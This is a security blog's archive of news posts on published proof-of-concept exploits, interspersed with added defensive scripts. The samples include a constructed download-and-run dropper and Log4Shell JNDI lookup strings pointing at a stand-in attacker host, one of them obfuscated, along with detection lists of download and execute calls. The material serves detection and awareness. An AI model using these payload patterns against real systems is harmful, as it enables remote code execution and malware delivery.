PoC exploit Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/poc-exploit/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Thu, 15 Jun 2023 16:49:01 +0000

Malware in GitHub Repositories Is Spread From Fake Security Company Name
https://gridinsoft.com/blogs/malware-in-github/
Thu, 15 Jun 2023 11:53:55 +0000

Researchers detected fake company accounts on GitHub linked to a deceitful cybersecurity company. These accounts are promoting harmful repositories on the code hosting service. According to the experts, all repositories claim to hold a proof-of-concept (PoC) exploit for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange. In fact, it was yet another example of malware in GitHub.

What is GitHub?

GitHub is a massive platform for hosting code. Researchers worldwide use it to share PoC exploits with the information security community. This helps others test patches and determine the scale and impact of bugs. Last year, there were 10 million occurrences of secrets being exposed on GitHub, a 67% increase from the previous year.

Fake Security Company Spreads Malware in GitHub

A team of VulnCheck experts closely monitors a large number of GitHub repositories as part of its Exploit Intelligence offering. During a routine check in early May, the researchers discovered a malicious repository on GitHub that claimed to be a Signal 0-day. It was then removed. The next day, an almost identical repository was discovered under a different account, this time claiming to be a WhatsApp zero-day. It, too, was deleted by the GitHub team. This process continued for a month.

After that, the attackers created a whole network of accounts, including half a dozen GitHub accounts and several related Twitter accounts. These accounts pretend to be part of a defunct security company called High Sierra Cyber Security. Here is an example of one such account:

[Image: The GitHub account of a fake security researcher]

According to the researchers, threat actors now use code repositories to trick unwary developers into doing their work for them. These actors have focused on social engineering tactics to make the repository owner appear legitimate, but their malware on GitHub is quite easy to identify. Since there is plenty of room for improvement, these attacks may become much more effective.

“While very unlikely, on some levels it looks like part of a research project. But it underscores what has become very obvious with public repositories: always, always check the code you upload for your projects. That’s it,” the experts say.

All the repositories have a straightforward structure depicted in the image below. Additionally, they use the “hot” CVE tagging to entice potential victims.

[Image: Repositories of a fake security account on GitHub]

How does it work?

The code in poc.py downloads a harmful binary and runs it. The Python script downloads a particular payload depending on the target’s operating system; the Discord “0-day” repository uses exactly this script to carry out these tasks.

Afterward, poc.py obtains one of two zip files from GitHub: cveslinux.zip or cveswindows.zip. The program unzips the file, saves it to the computer’s disk, and then runs it. The Windows binary has a high detection rate on VirusTotal (43/71), while the Linux binary has a much lower detection rate (3/62) but still contains strings that suggest its purpose.
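Because the dangerous part of such a “PoC” is the download-unpack-execute chain rather than any exploit logic, a quick static triage catches it before anyone runs the script. The following is an added example (not VulnCheck’s or Gridinsoft’s code, and not the real poc.py): it parses a script with Python’s `ast` module without executing it, collects calls that fetch remote content, unpack archives or launch processes, and flags the chain the article describes. `SAMPLE_POC` is a constructed stand-in with a placeholder URL.

```python
"""Static triage of a Python "PoC" script before anyone runs it.

Added example, not VulnCheck's or Gridinsoft's code. The script text is parsed
with ast (never executed); calls that download, unpack and execute are reported
and the download -> execute chain is flagged. SAMPLE_POC is constructed.
"""
import ast
from dataclasses import dataclass, field

# Dotted call names that mark each stage of a dropper-style script.
DOWNLOAD = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
UNPACK = {"zipfile.ZipFile", "tarfile.open", "shutil.unpack_archive"}
EXECUTE = {"subprocess.run", "subprocess.Popen", "subprocess.call",
           "os.system", "os.startfile", "os.execv", "exec", "eval"}
OS_PROBE = {"platform.system", "os.name", "sys.platform"}  # picks a payload per OS


def _dotted(node):
    """Render an a.b.c attribute chain (or a bare name) as text."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


@dataclass
class Triage:
    downloads: list = field(default_factory=list)  # (line, call name)
    unpacks: list = field(default_factory=list)
    executes: list = field(default_factory=list)
    os_probe: bool = False

    @property
    def verdict(self) -> str:
        if self.downloads and self.executes:
            return "HIGH: fetches remote content and executes it (dropper pattern)"
        if self.downloads or self.executes:
            return "REVIEW: network fetch or process execution present"
        return "LOW: no download/execute behaviour found"


def triage_source(source: str) -> Triage:
    """Collect suspicious calls from the script text without running it."""
    result = Triage()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in DOWNLOAD:
                result.downloads.append((node.lineno, name))
            elif name in UNPACK:
                result.unpacks.append((node.lineno, name))
            elif name in EXECUTE:
                result.executes.append((node.lineno, name))
        elif isinstance(node, ast.Attribute) and _dotted(node) in OS_PROBE:
            result.os_probe = True
    return result


# Constructed sample in the shape the article describes; placeholder URL, never run.
SAMPLE_POC = '''
import platform, zipfile, subprocess, urllib.request
url = ("https://example.invalid/cveslinux.zip" if platform.system() == "Linux"
       else "https://example.invalid/cveswindows.zip")
urllib.request.urlretrieve(url, "payload.zip")
zipfile.ZipFile("payload.zip").extractall("payload")
subprocess.run(["payload/run"])
'''

if __name__ == "__main__":
    report = triage_source(SAMPLE_POC)
    print(report.verdict)
    for stage, hits in (("download", report.downloads), ("unpack", report.unpacks),
                        ("execute", report.executes)):
        for lineno, call in hits:
            print(f"  line {lineno}: {stage} via {call}")
```

The matcher only resolves fully qualified names, so `from subprocess import run` or an alias such as `import os as o` slips past it; a production version would track import bindings. The point stands regardless: a script that both fetches a remote archive and launches what it unpacked deserves a sandbox, whatever its README claims.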

Conclusions:

An attacker has put much effort into creating fake identities to spread obvious malware in GitHub. They may have been successful; since they continue to use this method, they must think it works. It remains unclear whether this is an individual with too much free time or a more advanced campaign like the one discovered by Google TAG in January 2021.

Regardless, security researchers should be aware that they are attractive targets for cybercriminals and should exercise caution when downloading code from GitHub. Always scrutinize the code you are about to execute and avoid running anything you do not understand. Use virtual or dedicated machines on which you do not risk losing your data. Here, precautions are never excessive, especially considering the severity of malware on GitHub.

Your security may have been compromised if you’ve interacted with any of the accounts listed:

GitHub Accounts

Malicious Repositories

Twitter Accounts

0-day vulnerability remained unpatched for 2 years due to Microsoft bug bounty issues
https://gridinsoft.com/blogs/0-day-vulnerability-in-microsoft-remained-unpatched-for-2-years/
Tue, 01 Feb 2022 21:33:45 +0000

As part of January Patch Tuesday, Microsoft fixed a dangerous 0-day privilege escalation vulnerability for which a PoC exploit is available online.

The vulnerability is already being exploited in attacks by highly skilled hacker groups.

The exploit was published by Privacy Piiano founder and CEO Gil Dabah, who discovered the vulnerability two years ago.

Dabah said he chose not to report his discovery to Microsoft because it was very difficult to get paid through its vulnerability bounty program.

“Found it two years ago. Not recently. That’s the point. The reason I didn’t reveal it is because I waited a very long time for Microsoft to pay me for another find. By the time they finally paid, the fee had dwindled to almost nothing. I was already busy with my startup, and the vulnerability remained unpatched,” the researcher said.

The vulnerability, identified as CVE-2022-21882, could allow an attacker to elevate their privileges on the local system.

“A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,” Microsoft explained in its advisory, part of January’s Patch Tuesday updates.

Microsoft mentioned RyeLv as the researcher who discovered the vulnerability. The researcher submitted his description of the input type mismatch vulnerability in Win32k.sys on January 13, 2022.

“An attacker could tell the corresponding GUI API in user mode to make a kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc. These kernel functions will cause xxxClientAllocWindowClassExtraBytes to be returned. An attacker can intercept this return by capturing xxxClientAllocWindowClassExtraBytes in the KernelCallbackTable and using the NtUserConsoleControl method to set the ConsoleWindow flag on the tagWND object, which will modify the window type,” RyeLv explained.

Investment in the bounty program was also the top recommendation of RyeLv’s technical analysis for Microsoft. He described how to “kill the bug class”:

Improve the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.

Let me remind you that we also wrote that Zerodium offers up to $400,000 for exploits for Microsoft Outlook, and also that Google recruits a team of experts to find bugs in Android applications.

Zerodium offers up to $400,000 for exploits for Microsoft Outlook
https://gridinsoft.com/blogs/zerodium-offers-up-to-400000-for-exploits-for-microsoft-outlook/
Fri, 28 Jan 2022 21:31:13 +0000

Well-known exploit and vulnerability broker Zerodium announced that it is ready to pay up to $400,000 for zero-day vulnerabilities and exploits that will allow remote code execution in the Microsoft Outlook email client.

Previously, the maximum payout was $250,000. For similar bugs in Mozilla Thunderbird, the company is willing to pay up to $200,000.

Let me remind you that the Zerodium company, founded in 2015, has been buying up exploits for various zero-day vulnerabilities for a long time, in order to then resell them to governments and law enforcement agencies around the world. To do this, the company has its own bug bounty program, in which researchers can sell exploits for up to $2.5 million (depending on the type and nature of the bug).

In addition, from time to time the company holds “bug-fixing” campaigns, during which it buys exploits for a particular software at special prices. Previously, similar promotions were held for Pidgin, WordPress, hypervisors, popular VPN products, and so on.

Rewards for bugs in Mozilla Thunderbird and Microsoft Outlook have also been temporarily increased, the company said on Twitter.

“We’re currently paying up to $200,000 per exploit for Mozilla Thunderbird RCEs. We’re also (temporarily) increasing our bounty for MS Outlook RCEs to $400,000 (from $250,000),” Zerodium representatives wrote.

Zerodium does not specify which platform the exploits should target, but both email clients have versions for all three major operating systems—Windows, macOS, and Linux.

Many information security experts noted that a successful hack into either of the two email clients would give the attacker access not only to the user’s computer, but also to all mailboxes managed through the compromised client. Since account passwords can be extracted from the client, this also means that the party using the exploit will later be able to access cloud accounts.

You might also be interested to read that researchers noticed the darknet discussing exploits as a service, and that a PoC exploit was published for a fresh vulnerability in Ghostscript.

0-day In Log4j Library Poses A Threat To Many Applications & Servers
https://gridinsoft.com/blogs/0-day-in-log4j-library/
Fri, 10 Dec 2021 19:38:13 +0000

The Apache Software Foundation has released an emergency security update that fixes a 0-day vulnerability (CVE-2021-44228) in the popular Log4j logging library, which is part of the Apache Logging Project.

The patch was released as part of the 2.15.0 release.

The vulnerability was named Log4Shell and scored 10 out of 10 points on the CVSS vulnerability rating scale. The bug allows remote arbitrary code execution (RCE). Yesterday, information security researcher p0rz9 aggravated the problem by publishing a PoC exploit on Twitter; the vulnerability can be exploited remotely and does not require special technical skills.

“The vulnerability forces Java-based applications and servers that use the Log4j library to log a specific line to their internal systems. When an application or server processes such logs, a string can cause the vulnerable system to load and run a malicious script from the attacker’s controlled domain, the result will be a complete hijacking of the vulnerable application or server,” LunaSec specialists write, describing how Log4Shell works.

The problem was originally discovered while searching for bugs on Minecraft servers, but Log4j is present in almost all corporate applications and Java servers. For example, the library can be found in almost all enterprise products the Apache Software Foundation released, including Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Kafka, Apache Dubbo, and so on. Log4j is also actively used in various open-source projects, including Redis, ElasticSearch, Elastic Logstash, Ghidra, and others.

Thus, companies using any of these products are also indirectly vulnerable to Log4Shell attacks, but may not even know about it. Information security specialists already report that solutions of giants like Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase, and probably thousands of other companies may be vulnerable to Log4Shell.

p0rz9 wrote that CVE-2021-44228 could only be exploited if the log4j2.formatMsgNoLookups parameter is set to false. KnownSec 404 Team reports that Log4j 2.15.0 has set this parameter to true to prevent attacks. Log4j users who have upgraded to version 2.15.0 and then set the flag to false will again be vulnerable to attacks.

Moreover, Log4j users who have not updated, but have set the flag to true, will still be able to block attacks even on older versions.

Unfortunately, this also means that all older versions are at risk, where this parameter is set to false by default. That is, all previous releases of Log4j, starting with 2.10.0, are vulnerable.
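Two things a defender can check immediately follow from the description above and from the discussion of the formatMsgNoLookups flag: whether a deployment’s log4j2 properties file actually disables message lookups, and whether logged, attacker-controlled fields already carry the lookup pattern that CVE-2021-44228 abuses. The script below is an added example (not Apache’s, LunaSec’s or p0rz9’s code); the properties text and access-log lines are constructed samples, and the nested `${lower:j}` form in one of them is the evasion seen in the wild that breaks naive `${jndi:` string matching.

```python
"""Log4Shell exposure triage from the defender's side.

Added example, not Apache's, LunaSec's or p0rz9's code. Checks (1) whether a
log4j2 properties file sets log4j2.formatMsgNoLookups=true and (2) whether
log lines contain a ${jndi:...} lookup, after collapsing nested single-char
lookups used to hide it. All sample data below is constructed.
"""
import re

# Inner lookups such as ${lower:j} or ${::-j} resolve to one character; collapse
# them (but never a jndi lookup itself) so the outer pattern becomes visible.
NESTED = re.compile(r"\$\{(?!\s*jndi\s*:)[^{}]*[:\-]([^{}])\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def lookups_disabled(properties_text: str) -> bool:
    """True only if the file explicitly sets log4j2.formatMsgNoLookups=true."""
    for raw in properties_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        if key.strip() == "log4j2.formatMsgNoLookups":
            return value.strip().lower() == "true"
    # Absent key: the library default applies, which the article notes is
    # false on releases before 2.15.0.
    return False


def normalise(line: str) -> str:
    """Collapse nested single-character lookups until nothing changes."""
    prev = None
    while prev != line:
        prev, line = line, NESTED.sub(r"\1", line)
    return line


def find_lookup_attempts(log_lines):
    """Return (line number, original line) for lines carrying a JNDI lookup."""
    return [(n, line) for n, line in enumerate(log_lines, 1)
            if JNDI.search(normalise(line))]


# Constructed samples: a weak and a hardened properties file, and access-log
# lines whose user-agent field is attacker-controlled input that gets logged.
WEAK_CONFIG = "# log4j2.component.properties\nlog4j2.formatMsgNoLookups=false\n"
HARDENED_CONFIG = "# log4j2.component.properties\nlog4j2.formatMsgNoLookups=true\n"
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 ua="${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 ua="${${lower:j}ndi:ldap://attacker.invalid/a}"',
    "app: user ${user} logged in",
]

if __name__ == "__main__":
    print("weak config disables lookups:", lookups_disabled(WEAK_CONFIG))
    print("hardened config disables lookups:", lookups_disabled(HARDENED_CONFIG))
    for n, line in find_lookup_attempts(SAMPLE_LOGS):
        print(f"lookup attempt on log line {n}: {line}")
```

One caveat that postdates the article: the formatMsgNoLookups flag was later shown to be an incomplete mitigation (CVE-2021-45046 led to Log4j 2.16.0 removing message lookups entirely), so the config check above is a triage signal, not a substitute for upgrading. The log scan is likewise a first-pass indicator; obfuscation variants beyond the single-character nesting handled here exist, and a hit means the string reached your logs, not necessarily that the lookup fired.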

According to experts from Bad Packets and Greynoise, several cybercriminals are already scanning the network in search of applications that may be vulnerable to Log4Shell, which means that there is almost no time left to install patches.

Let me remind you that I also talked about the fact that the IIS bug with worm potential poses a threat to WinRM servers.

Trojan Source attack is dangerous for compilers of most programming languages
https://gridinsoft.com/blogs/trojan-source-attack/
Fri, 05 Nov 2021 16:11:00 +0000

Scientists at the University of Cambridge, Ross Anderson and Nicholas Boucher, have published information about the Trojan Source attack concept (CVE-2021-42574), which can be used to inject malicious code into legitimate applications through comment fields. The PoC exploit is already available on GitHub.

The attack is based on the use of bidirectional control characters in source code comments. Such characters, known as BiDi (“bidirectional”), are Unicode control characters that are used within a text string to signal the transition from LTR (left to right) to RTL (right to left) mode and vice versa.

In practice, these characters are used exclusively for software applications and are invisible to humans, since they are only used to embed text with a different reading direction in large blocks of text (for example, to insert lines in Arabic or Hebrew).

Researchers have found that most compilers and code editors have no protocols for handling BiDi symbols or signalling their presence in source comments.

According to experts, attackers can insert BiDi control characters into comments that people cannot see, and upon compilation, they will move text from the comment field into executable code or move code in comments, thereby exposing applications to attacks and bypassing security checks.

[Image: Trojan Source attack]

“We have verified that this attack works against C, C++, C#, JavaScript, Java, Rust, Go and Python, and we suspect that it will work against most modern languages,” the researchers write.

In addition to compilers, several code editors and hosting services, as listed in the table below, are also reported to be affected.

[Image: Table of affected code editors and hosting services]

In addition, according to experts, source code compilers are vulnerable to another problem (CVE-2021-42694) related to homoglyphs. During such attacks, classic Latin letters are replaced with similar characters from other alphabets.

The researchers write that the second attack can be used to create two different functions that look the same to the human eye but are actually different. Anderson and Boucher claim that in this way, an attacker can covertly add malicious code to a project.

[Image: Homoglyph attack example]

The researchers summarize that compilers and editors should detect bidirectional control characters and homoglyphs and be sure to communicate them to people. So far, however, only the developers behind the official Rust compiler have released the update.
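The detection the researchers call for can be done in the build pipeline without waiting for compiler support. The script below is an added example, not the Cambridge researchers’ code: it reports every Unicode bidirectional control character in a source file (the CVE-2021-42574 vector) and every identifier that mixes letters from more than one script, which is how a Cyrillic letter standing in for a Latin one (the CVE-2021-42694 homoglyph case) shows up. The two sample snippets are constructed; the script of a letter is approximated from its Unicode character name, which is sufficient for the Latin/Cyrillic/Greek confusables at issue.

```python
"""Trojan Source indicators: BiDi control characters and mixed-script identifiers.

Added example, not the Cambridge researchers' code. Sample inputs are constructed.
Intended for a pre-commit hook or CI step over source and comment text.
"""
import re
import unicodedata

# Unicode bidirectional controls (explicit embeddings, overrides, isolates, marks).
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI", "\u200e": "LRM", "\u200f": "RLM", "\u061c": "ALM",
}
IDENT = re.compile(r"[^\W\d]\w*")  # identifier-shaped tokens, any script


def find_bidi(source: str) -> list:
    """Return (line, column, control name) for every BiDi control in source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if ch in BIDI_CONTROLS:
                hits.append((lineno, col, BIDI_CONTROLS[ch]))
    return hits


def _script_of(ch: str) -> str:
    """Approximate a letter's script from the first word of its Unicode name,
    e.g. LATIN SMALL LETTER A -> LATIN, CYRILLIC CAPITAL LETTER EN -> CYRILLIC."""
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def find_mixed_script_identifiers(source: str) -> list:
    """Return (line, identifier, scripts) for identifiers mixing alphabets."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in IDENT.finditer(line):
            ident = match.group()
            scripts = {_script_of(c) for c in ident if c.isalpha()}
            if len(scripts) > 1:
                hits.append((lineno, ident, tuple(sorted(scripts))))
    return hits


def scan(source: str) -> dict:
    """Combined report; an empty dict means no Trojan Source indicators."""
    report = {}
    if bidi := find_bidi(source):
        report["bidi"] = bidi
    if mixed := find_mixed_script_identifiers(source):
        report["mixed_script"] = mixed
    return report


# Constructed samples: a comment carrying RLO and LRI controls, and a second
# function whose name uses Cyrillic EN (U+041D) in place of Latin H.
SAMPLE_BIDI = "/* \u202e comment \u2066 */ int x = 1;\n"
SAMPLE_HOMOGLYPH = "def sayHello():\n    pass\ndef say\u041dello():\n    pass\n"

if __name__ == "__main__":
    for label, text in (("bidi", SAMPLE_BIDI), ("homoglyph", SAMPLE_HOMOGLYPH)):
        print(label, scan(text) or "clean")
```

Flagging any BiDi control at all is the right default for source code: the legitimate use the article mentions (embedding Arabic or Hebrew text) is rare inside program text and can be allow-listed per file, whereas an override in a comment next to code has no honest reading. The mixed-script check deliberately reports identifiers, not whole files, because a project may legitimately contain both Latin and non-Latin names as long as no single name mixes them.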

Let me remind you that I also wrote that Expert hacked 70% of Wi-Fi networks in Tel Aviv for research.

PoC exploit published for fresh vulnerability in Ghostscript
https://gridinsoft.com/blogs/poc-exploit-published-for-fresh-vulnerability-in-ghostscript/
Fri, 10 Sep 2021 20:13:04 +0000

A PoC exploit for a fresh vulnerability in Ghostscript was presented this week. The issue endangers all servers using this component.

The exploit was published by a Vietnamese information security specialist who is known online under the pseudonym Nguyen The Duc. The code is already available on GitHub, and the effectiveness of the exploit has been confirmed by several leading researchers.

Ghostscript, which dates back to 1988, is a small library that allows applications to process PDF documents and PostScript-based files. While Ghostscript is primarily used in desktop software, it is also used on the server side as it is often included in image converting and file uploading toolkits such as ImageMagick.

The exploit introduced this week allows an attacker to download a malformed SVG file that escapes the image processor and runs malicious code on the underlying OS.

Interestingly, the vulnerability for which the exploit was created was not discovered by Nguyen The Duc. The credit goes to Emil Lerner, CTO and founder of Wunderfund, who found the bug last year and used it to get rewards from companies like Airbnb, Dropbox and Yandex. Details of the vulnerability went public last month after Lerner gave a talk at the ZeroNight conference.

“Here’re slides from my talk at ZeroNights X! A 0-day for GhostScript 9.50, RCE exploit chain for ImageMagick with the default settings from Ubuntu repos and several bug bounty stories inside,” Emil Lerner wrote on Twitter.

Additionally, the researcher shared a link to his presentation.

The Record reports that there is still no patch for this vulnerability, moreover, the Artifex company, which is behind the development of Ghostscript, reported that no one had officially notified it about this problem. The company said that it is “more and more frustrated with cybersecurity researchers who neglect the ethical disclosure of potentially dangerous security vulnerabilities,” and promised to release a fix as soon as possible.

Let me remind you that we also reported that GitHub developers are reviewing the exploit posting policy due to a recent scandal.

Unofficial patch published for PrintNightmare vulnerability
https://gridinsoft.com/blogs/patch-published-for-printnightmare/
Mon, 05 Jul 2021 16:12:31 +0000

Last week I talked about a PoC exploit for the dangerous vulnerability CVE-2021-34527 in Windows Print Spooler (spoolsv.exe), which researchers named PrintNightmare, and now an unofficial patch for this problem has been published.

When the exploit was published, the researchers found that the patch released in June did not completely fix the problem. Moreover, the publication of the exploit has left many researchers confused, and some have suggested that PrintNightmare is a standalone zero-day vulnerability that needs its own fix.

For example, Mitja Kolsek, head of Acros Security and co-founder of 0patch, wrote about this on Twitter.

“Before this gets too confusing: PrintNightmare is NOT the same as CVE-2021-1675. CVE-2021-1675: Fixed in June updates. PrintNightmare: 0day,” Mitja Kolsek wrote on his Twitter.

The problem affects all versions of Windows, can even affect XP and Vista, and helps remotely execute arbitrary code with SYSTEM privileges, which allows an attacker to install programs, view, modify or delete data, and create new accounts with user rights.

There is no patch for this vulnerability yet, and Microsoft experts reported that the problem is already being exploited in real life, although the company did not specify whether this is being done by cybercriminals or information security researchers.

Microsoft engineers offered administrators several solutions to the problem. For example, it is recommended to disable Print Spooler completely by blocking printing locally and remotely. It is also possible to disable incoming remote printing through Group Policy, which will block the main vector of potential attacks. In the second case, “the system will no longer function as a print server, but local printing from directly connected devices will still be possible.”

Now a third option has appeared: the experts involved in the development of the 0patch solution have prepared temporary patches (or micro-patches) for this problem. Let me remind you that 0patch is a platform designed just for such situations, that is, fixing 0-day and other unpatched vulnerabilities, to support products that are no longer supported by manufacturers, custom software, and so on.

Micropatches are available for Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2008 R2, as well as Windows 10 v20H2, Windows 10 v2004, and Windows 10 v1909.
